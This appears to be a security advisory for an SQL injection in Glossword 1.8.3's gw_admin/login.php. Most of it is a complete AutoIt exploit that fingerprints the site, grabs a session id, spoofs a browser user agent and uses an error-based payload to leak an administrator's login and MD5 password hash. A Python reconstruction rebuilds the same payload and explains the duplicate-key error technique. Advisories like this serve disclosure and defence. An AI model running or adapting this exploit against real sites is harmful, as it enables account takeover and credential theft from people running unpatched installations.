login.php intrusion: Glossword 'login.php' SQL Injection Vulnerability

Published: 2013-02-05

Updated: 2013-02-27

Affected systems:

sourceforge glossword 1.8.3

Description:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 57732

Glossword is a system for creating and publishing online multilingual dictionaries, glossaries and encyclopedias.

In Glossword 1.8.3 (other versions may also be affected) the gw_admin/login.php script does not sanitize the 'arPost[user_name]' parameter before using it in a query; the exploit below reaches it through the lost-password action (a=lostpass). An attacker can inject or manipulate SQL queries against the back-end database. The published exploit is error-based: it leaks the login and MD5 password hash of a chosen gw_auth row through a MySQL duplicate-group-key error, and it needs an unescaped single quote, so it only works when magic_quotes_gpc is off (which is a precondition for this particular payload, not a fix for the bug).

Links: http://osvdb.org/89882

http://xforce.iss.net/xforce/xfdb/81837

http://packetstormsecurity.com/files/120044/glossword1.8.3_sqli_exploit.txt


Test method:

--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

#cs
==============================================================
Vulnerable Software: Glossword 1.8.3
Official site: http://sourceforge.net/projects/glossword/
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/
Vuln: SQLi
==================THIS IS A WHOLE EXPLOIT=====================
Exploit coded in AutoIt.
To exploit this vulnerability magic_quotes_gpc must be turned off on the server side.
Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png
POC video: http://youtu.be/55IaNTQS3Fk

Exploit usage:
C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2

##############################################################
#          Glossword 1.8.3 SQL injection Exploit            #
# Usage: glossa.exe http://site.tld  /installdir/  UID (int) #
#        DON'T HATE THE HACKER, HATE YOUR OWN CODE!          #
#            VULN/Exploit: AkaStep & HERO_AZE                #
##############################################################
##############################################################
[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]
##############################################################
##############################################################
[*]                  CMS is GLOSSWORD!                    [*]
##############################################################
##############################################################
[*]                FETCHING VALID SESSUID                  [*]
##############################################################
##############################################################
[*]  Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03  [*]
##############################################################
##############################################################
[*]                  !~ P*W*N*E*D ~!                      [*]
--------------------------------------------------------------
[*] Login: admin                                          [*]
--------------------------------------------------------------
[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d      [*]
--------------------------------------------------------------
Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php
--------------------------------------------------------------
[*]                    Good Luck;)                        [*]
##############################################################
[*]                    DONE                              [*]
##############################################################
#ce

#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=glossa.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <String.au3> ; _StringRepeat (the two include names were lost in extraction and are restored here)
#include <INet.au3>   ; _INetGetSource, HttpSetUserAgent

$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF  & _
'# Usage: ' & @ScriptName &  ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _
@CRLF & "#        DON'T HATE THE HACKER, HATE YOUR OWN CODE!          #" & @CRLF & _
'#            VULN/Exploit: AkaStep & HERO_AZE                #' & @CRLF & _StringRepeat('#',62)
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST'
$vulnurl='gw_admin/login.php'   ; vulnerable script (lost-password action)
Global $sessid=0
$cmsindent='lossword'           ; We will use it to identify CMS
$adminpanel=$vulnurl
; Impersonate that we are not a bot or exploit: we are a human who uses IE.
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' /installdir/ ' &  ' UID (int)' & @CRLF

If $CmdLine[0] <> 3 Then
    ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF)
    MsgBox(64,"",$msg_usage)
    Exit
EndIf
If $CmdLine[0]=3 Then
    $targetsite=$CmdLine[1]     ; e.g. http://site.tld
    $installdir=$CmdLine[2]     ; e.g. /glossword/glossword/
    $uidtoattack=Number(StringMid($CmdLine[3],1,255))  ; gw_auth.id_auth of the row to dump
EndIf
If Not StringIsDigit($uidtoattack) Then
    ConsoleWrite(' UID is wrong! Exit' )
    Exit
EndIf
If StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then
    ConsoleWrite('Are you kidding meeeeen?')
    Exit
EndIf

HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1)  ; connectivity check only
If @error Then
    ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)
    Exit
EndIf
Sleep(Random(1200,2500,1))
sendfakeretrivevalidsess($targetsite,$installdir)   ; fingerprints the CMS, gets a sid, then calls exploit()
HttpSetUserAgent($useragent)
$sidentify=_INetGetSource($targetsite & $adminpanel,True)  ; fetched after exploit() returns; result is unused

Func exploit($targetsite,$installdir,$sessid)
    Global $sAddress = $targetsite
    ; Error-based injection: the subquery leaks gw_auth.login and gw_auth.password wrapped in
    ; <sikdir>...</sikdir> (0x3C73696B6469723E / 0x3C2F73696B6469723E) as part of a GROUP BY key
    ; built from floor(rand(0)*2); MySQL re-evaluates the key on insert, so a "Duplicate entry"
    ; error containing the leaked row is reflected in the response. Needs magic_quotes_gpc off
    ; because the payload opens with an unescaped single quote.
    Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _
    "concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _
    "gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _
    " AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password"
    Global $sDomain = $targetsite          ; bare host name (scheme and slashes stripped by the caller)
    Global $sPage = $installdir & $vulnurl
    Global $sAdditionalData = $PAYLOADTOSEND
    Global $hOpen = _WinHttpOpen($useragent)
    Global $hConnect = _WinHttpConnect($hOpen, $sDomain)
    Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')
    _WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)
    _WinHttpReceiveResponse($hRequest)
    Global $sReturned
    If _WinHttpQueryDataAvailable($hRequest) Then
        Do
            $sReturned &= _WinHttpReadData($hRequest)
        Until @error
        ; The marker tags were stripped by HTML extraction on the published page; restored from the hex above.
        If StringInStr($sReturned,'<sikdir>') And StringInStr($sReturned,'</sikdir>') Then
            $zsuxxv = StringRegExp($sReturned, '(?i)<sikdir>(.*?)</sikdir>', 1)  ; capture "login|md5hash"
            For $x = 0 To UBound($zsuxxv) - 1
                Beep(100,1000)
                ConsoleWrite($triptrop & '[*]                  !~ P*W*N*E*D ~!                      [*] ' & _
                StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _
                _StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _
                StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _
                '      [*] ' & _
                StringReplace($triptrop,'#','-') & _
                'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _
                '[*]                    Good Luck;)                        [*]' & _
                $triptrop & '[*]                    DONE                              [*]' & _
                $triptrop)
            Next
        Else
            ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & '  NO SUCH UID!  ' &  _StringRepeat(' ',18) & _
            ' [*]' & $triptrop)
            Beep(1500,1000)
            Exit
        EndIf
    EndIf
    _WinHttpCloseHandle($hRequest)
    _WinHttpCloseHandle($hConnect)
    _WinHttpCloseHandle($hOpen)
EndFunc   ;==> exploit()

Func sendfakeretrivevalidsess($targetsite,$installdir)
    ; Build a random 32-char hex-looking sid; Glossword answers "Session does not exist." and
    ; issues a fresh valid sid in the page, which we then reuse for the injected POST.
    $fakesessionID=''
    Do
        $fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1)
    Until StringLen($fakesessionID)=32
    $fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1)
    ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID &  ' [*] ' &  $triptrop)
    Sleep(Random(1000,2500,1))
    $rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID
    HttpSetUserAgent($useragent)
    $str=_INetGetSource($rtarget)
    If StringInStr($str,"Session does not exist.") Then
        ConsoleWrite($triptrop & '[*]' &  _StringRepeat(' ',18) & 'CMS is GLOSSWORD!  ' &  _StringRepeat(' ',19) & '[*]' & $triptrop)
        Sleep(Random(1000,2500,1))
    Else
        ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop)
        Exit
    EndIf
    ; Scan the response from a fixed offset (123) up to the first double quote; the valid sid is the
    ; 32 chars after the "=" in that fragment. This depends on Glossword's page layout.
    $i=123
    $mystr=''
    ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop)
    Sleep(Random(1000,2500,1))
    Do
        $i+=1
        If $i>=4000 Then ExitLoop ; just to make sure we are not going into an infinite loop if any error occurs
        $mystr&=StringMid($str,$i,1)
    Until StringInStr($mystr,Chr(34))
    $sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32)
    ; The original compared "Not $sessid = 32", which never checks the length; test the length itself.
    If StringLen($sessid) <> 32 Then
        ConsoleWrite($triptrop & '[*] Sorry Man! There is an error while fetching new VALID SESSUID  [*]' & $triptrop)
        Exit
    Else
        ConsoleWrite($triptrop & '[*]  Got VALID SESSUID: ' & $sessid &  '  [*]' & $triptrop)
    EndIf
    $targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','')  ; WinHttp wants the bare host
    exploit($targetsite,$installdir,$sessid)
EndFunc   ;==> sendfakeretrivevalidsess()

#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
#ce
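The two mechanisms the exploit above depends on are easier to see in isolation than in the AutoIt. The following is an added example written for this page, not Glossword code and not part of the AkaStep/HERO_AZE exploit. It assumes MySQL's RAND() is the seed1/seed2 generator from mysys/my_rnd.c seeded as in Item_func_rand::seed_random (the classic MySQL 5.x implementation), and that a temporary-table GROUP BY evaluates a non-deterministic key twice for every new group (once to look it up, once to insert it). It reproduces the floor(rand(0)*2) sequence, shows why the third scanned row collides and raises the "Duplicate entry" error, builds the same form fields the exploit POSTs, and parses the leaked login|hash out of a constructed copy of that error using the <sikdir> markers the payload encodes as hex. The login and hash values are constructed sample data.

```python
# Added example: models the error-based injection used against gw_admin/login.php.
# Assumptions (not from the advisory): MySQL RAND() LCG from mysys/my_rnd.c, and
# GROUP BY evaluating a non-deterministic key twice per new group.
import re

MAX_VALUE = 0x3FFFFFFF  # my_rnd.c: max_value


class MySQLRand:
    """RAND(seed) as MySQL computes it: two-state LCG from my_rnd.c."""

    def __init__(self, seed):
        # Item_func_rand::seed_random -> randominit(seed*0x10001+55555555, seed*0x10000001)
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def rand(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0_x2(n):
    """The deterministic sequence floor(rand(0)*2) yields over n evaluations."""
    g = MySQLRand(0)
    return [int(g.rand() * 2) for _ in range(n)]


# Markers the payload wraps the leaked row in (the hex literals from the exploit).
MARK_OPEN = bytes.fromhex("3C73696B6469723E").decode()    # "<sikdir>"
MARK_CLOSE = bytes.fromhex("3C2F73696B6469723E").decode()  # "</sikdir>"


def build_form(uid, sid):
    """POST fields gw_admin/login.php receives; the injection rides arPost[user_name]."""
    inj = ("') AND (select floor(rand(0)*2) from(select count(*),"
           "concat((select concat(0x3C73696B6469723E,login,0x7c,password,"
           "0x3C2F73696B6469723E,0x7c) from gw_auth where id_auth=%d),"
           "floor(rand(0)*2))x from information_schema.tables group by x)a)-- "
           " AND 1=('1" % uid)
    return {"arPost[user_name]": inj, "arPost[user_email]": "trueownage",
            "a": "lostpass", "sid": sid, "post": "Send password"}


def simulate_group_by(leaked, rows=3):
    """
    Run `group by x` over `rows` source rows with x = concat(leaked, floor(rand(0)*2)).
    Returns the error MySQL raises on the first duplicate group key, or '' if none.
    """
    g = MySQLRand(0)
    groups = {}
    for _ in range(rows):
        key = leaked + str(int(g.rand() * 2))   # evaluation 1: look the group up
        if key in groups:
            groups[key] += 1
            continue
        key = leaked + str(int(g.rand() * 2))   # evaluation 2: key actually inserted
        if key in groups:                       # rand() advanced, so it can collide
            return "Duplicate entry '%s' for key 'group_key'" % key
        groups[key] = 1
    return ""


LEAK_RE = re.compile(re.escape(MARK_OPEN) + r"(.*?)\|(.*?)" + re.escape(MARK_CLOSE))


def parse_leak(body):
    """Pull (login, password_hash) out of the reflected error, as the exploit does."""
    m = LEAK_RE.search(body)
    return (m.group(1), m.group(2)) if m else None


def demo(login="admin", pw_hash="260efaff0cac0f78a53ccc540e89e72d"):
    """Constructed gw_auth row -> simulated MySQL error -> parsed credentials."""
    leaked = MARK_OPEN + login + "|" + pw_hash + MARK_CLOSE + "|"
    return parse_leak(simulate_group_by(leaked))


if __name__ == "__main__":
    print(floor_rand0_x2(6))  # row 3's insert key repeats row 1's, hence the error
    print(build_form(2, "a" * 32)["arPost[user_name]"])
    print(demo())
```

With rand(0) the sequence is 0, 1, 1, 0, 1, 1, ...: the first row misses on key 0 and is inserted under key 1, the second row hits key 1, the third row misses on key 0 and is again inserted under key 1, which is the duplicate. That is why the payload selects from information_schema.tables (any table with at least three rows works) and why the leak needs the error text to be reflected in the response; a server that suppresses database errors defeats this particular payload but not the injection itself.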

Recommendation:

--------------------------------------------------------------------------------

Vendor patch:

sourceforge

-----------

The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://sourceforge.net/projects/glossword/

Note that the magic_quotes_gpc requirement in the exploit header is a precondition of this one payload, not a mitigation: the fix is to parameterize or properly escape the 'arPost[user_name]' value in gw_admin/login.php.
